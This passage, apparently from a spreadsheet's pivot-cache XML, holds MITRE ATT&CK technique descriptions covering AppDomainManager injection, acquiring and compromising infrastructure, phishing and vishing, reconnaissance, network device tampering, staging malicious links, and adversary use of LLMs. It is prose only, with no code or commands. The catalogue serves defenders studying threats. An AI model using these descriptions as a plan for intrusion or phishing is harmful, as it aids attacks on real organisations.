legitimate process."/>
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) _x000a__x000a_Known as &quot;AppDomainManager injection,&quot; adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)"/>
  </r>
  <r>
    <x v="155"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="155"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="155"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances."/>
  </r>
  <r>
    <x v="155"/>
    <x v="3"/>
    <s v="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_x000a__x000a_An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)"/>
  </r>
  <r>
    <x v="155"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="155"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). "/>
  </r>
  <r>
    <x v="156"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="157"/>
    <x v="27"/>
    <s v="Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase._x000a__x000a_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
  </r>
  <r>
    <x v="157"/>
    <x v="27"/>
    <s v="Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free._x000a__x000a_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quot;IDN homograph attacks,&quot; creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)_x000a__x000a_Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)_x000a__x000a_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_x000a__x000a_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_x000a__x000a_In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)"/>
  </r>
  <r>
    <x v="157"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="157"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="157"/>
    <x v="27"/>
    <s v="Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked) _x000a__x000a_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
  </r>
  <r>
    <x v="157"/>
    <x v="27"/>
    <s v="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
  </r>
  <r>
    <x v="157"/>
    <x v="27"/>
    <s v="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Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them."/>
  </r>
  <r>
    <x v="157"/>
    <x v="27"/>
    <s v="Adversaries may purchase and configur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_x000a__x000a_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r>
  <r>
    <x v="157"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="158"/>
    <x v="27"/>
    <s v="Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network device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_x000a__x000a_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_x000a__x000a_By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)"/>
  </r>
  <r>
    <x v="158"/>
    <x v="27"/>
    <s v="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taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="158"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="158"/>
    <x v="27"/>
    <s v="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_x000a__x000a_Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party."/>
  </r>
  <r>
    <x v="158"/>
    <x v="27"/>
    <s v="Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations._x000a__x000a_Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations."/>
  </r>
  <r>
    <x v="158"/>
    <x v="27"/>
    <s v="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
  </r>
  <r>
    <x v="158"/>
    <x v="27"/>
    <s v="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
  </r>
  <r>
    <x v="158"/>
    <x v="27"/>
    <s v="Adversaries may compromis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_x000a__x000a_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r>
  <r>
    <x v="158"/>
    <x v="27"/>
    <s v="Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting._x000a__x000a_Once an adversary has control, compromised network devices can be used to launch additional operations, such as hosting payloads for [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (i.e., [Link Target](https://attack.mitre.org/techniques/T1608/005)) or enabling the required access to execute [Content Injection](https://attack.mitre.org/techniques/T1659) operations. Adversaries may also be able to harvest reusable credentials (i.e., [Valid Accounts](https://attack.mitre.org/techniques/T1078)) from compromised network devices._x000a__x000a_Adversaries often target Internet-facing edge devices and related network appliances that specifically do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)_x000a__x000a_Compromised network devices may be used to support subsequent [Command and Control](https://attack.mitre.org/tactics/TA0011) activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Botnet](https://attack.mitre.org/techniques/T1584/005) network.(Citation: Justice GRU 2024)"/>
  </r>
  <r>
    <x v="159"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)_x000a_"/>
  </r>
  <r>
    <x v="159"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="159"/>
    <x v="27"/>
    <s v="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Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin)_x000a__x000a_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_x000a__x000a_To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016) "/>
  </r>
  <r>
    <x v="159"/>
    <x v="27"/>
    <s v="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_x000a__x000a_Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider. "/>
  </r>
  <r>
    <x v="160"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos._x000a__x000a_Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566)."/>
  </r>
  <r>
    <x v="160"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="160"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries can use a compromised email account to hijack existing email threads with targets of interest."/>
  </r>
  <r>
    <x v="160"/>
    <x v="27"/>
    <s v="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Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)_x000a__x000a_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
  </r>
  <r>
    <x v="161"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="161"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="161"/>
    <x v="27"/>
    <s v="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_x000a__x000a_Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations."/>
  </r>
  <r>
    <x v="161"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control."/>
  </r>
  <r>
    <x v="161"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="162"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="162"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="162"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="162"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="162"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)_x000a__x000a_After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control."/>
  </r>
  <r>
    <x v="162"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="162"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="162"/>
    <x v="27"/>
    <s v="Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)_x000a__x000a_For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)_x000a_"/>
  </r>
  <r>
    <x v="163"/>
    <x v="28"/>
    <s v="Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations._x000a__x000a_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 or permitted MFA /methods associated with those usernames.(Citation: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023)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_x000a__x000a_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r>
  <r>
    <x v="163"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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itation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)_x000a__x000a_Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.). Adversaries may purchase credentials from dark web markets, such as Russian Market and 2easy, or through access to Telegram channels that distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer Stealer Logs 2023)_x000a__x000a_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
  </r>
  <r>
    <x v="163"/>
    <x v="28"/>
    <s v="Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees._x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="163"/>
    <x v="28"/>
    <s v="Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures._x000a__x000a_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r>
  <r>
    <x v="164"/>
    <x v="28"/>
    <s v="Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations._x000a__x000a_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r>
  <r>
    <x v="164"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="164"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)"/>
  </r>
  <r>
    <x v="164"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="164"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="164"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="164"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="165"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="165"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="165"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="165"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="165"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="166"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)"/>
  </r>
  <r>
    <x v="166"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="166"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="166"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="166"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="167"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="167"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="167"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="167"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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_x000a__x000a_**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories. "/>
  </r>
  <r>
    <x v="168"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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_x000a__x000a_In addition to manually browsing the website, adversaries may attempt to identify hidden directories or files that could contain additional sensitive information or vulnerable functionality. They may do this through automated activities such as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as well as by leveraging files such as sitemap.xml and robots.txt.(Citation: Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "/>
  </r>
  <r>
    <x v="169"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="169"/>
    <x v="28"/>
    <s v="Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses._x000a__x000a_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r>
  <r>
    <x v="169"/>
    <x v="28"/>
    <s v="Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use._x000a__x000a_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
  </r>
  <r>
    <x v="169"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="170"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="170"/>
    <x v="28"/>
    <s v="Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts._x000a__x000a_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r>
  <r>
    <x v="170"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="170"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="170"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="170"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="171"/>
    <x v="28"/>
    <s v="Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)_x000a__x000a_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r>
  <r>
    <x v="171"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="171"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="172"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="172"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="172"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="172"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also embed “tracking pixels”, &quot;web bugs&quot;, or &quot;web beacons&quot; within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) (Citation: Ryte Wiki) These mechanisms often appear as small images (typically one pixel in size) or otherwise obfuscated objects and are typically delivered as HTML code containing a link to a remote server. (Citation: Ryte Wiki)(Citation: IAPP)_x000a__x000a_Adversaries may also be able to spoof a complete website using what is known as a &quot;browser-in-the-browser&quot;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_x000a__x000a_Adversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to perform adversary-in-the-middle phishing by proxying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_x000a__x000a_Adversaries may also send a malicious link in the form of Quick Response (QR) Codes (also known as “quishing”). These links may direct a victim to a credential phishing page.(Citation: QR-campaign-energy-firm) By using a QR code, the URL may not be exposed in the email and may thus go undetected by most automated email security scans.(Citation: qr-phish-agriculture) These QR codes may be scanned by or delivered directly  to a user’s mobile device (i.e., [Phishing](https://attack.mitre.org/techniques/T1660)), which may be less secure in several relevant ways.(Citation: qr-phish-agriculture) For example, mobile users may not be able to notice minor differences between genuine and credential harvesting websites due to mobile’s smaller form factor._x000a__x000a_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
  </r>
  <r>
    <x v="172"/>
    <x v="28"/>
    <s v="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_x000a__x000a_All forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or &quot;vishing&quot;), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)_x000a__x000a_Victims may also receive phishing messages that direct them to call a phone number (&quot;callback phishing&quot;) where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)_x000a__x000a_Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim."/>
  </r>
  <r>
    <x v="173"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="173"/>
    <x v="3"/>
    <s v="Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks._x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities"/>
  </r>
  <r>
    <x v="174"/>
    <x v="3"/>
    <s v="Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="174"/>
    <x v="3"/>
    <s v="Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="174"/>
    <x v="3"/>
    <s v="Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data._x000a__x000a_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
  </r>
  <r>
    <x v="175"/>
    <x v="3"/>
    <s v="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_x000a__x000a_To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device."/>
  </r>
  <r>
    <x v="175"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). _x000a__x000a_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
  </r>
  <r>
    <x v="175"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="176"/>
    <x v="2"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="176"/>
    <x v="2"/>
    <s v="Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP)._x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="176"/>
    <x v="2"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="177"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="177"/>
    <x v="1"/>
    <s v="Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access._x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="177"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_An adversary may gain administrative Entra I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
  </r>
  <r>
    <x v="178"/>
    <x v="27"/>
    <s v="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_x000a__x000a_Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):_x000a__x000a_* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)_x000a_* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)_x000a_* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)_x000a_* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)"/>
  </r>
  <r>
    <x v="178"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="178"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool."/>
  </r>
  <r>
    <x v="178"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="178"/>
    <x v="27"/>
    <s v="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_x000a__x000a_Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:_x000a__x000a_* Inserting malicious scripts into web pages or other user controllable web content such as forum posts_x000a_* Modifying script files served to websites from publicly writeable cloud storage buckets_x000a_* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)."/>
  </r>
  <r>
    <x v="178"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001)._x000a__x000a_Links can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking)_x000a__x000a_Adversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs (including one-time, single use links).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)"/>
  </r>
  <r>
    <x v="178"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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_x000a__x000a_In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)_x000a__x000a_Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)_x000a__x000a_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
  </r>
  <r>
    <x v="179"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="180"/>
    <x v="29"/>
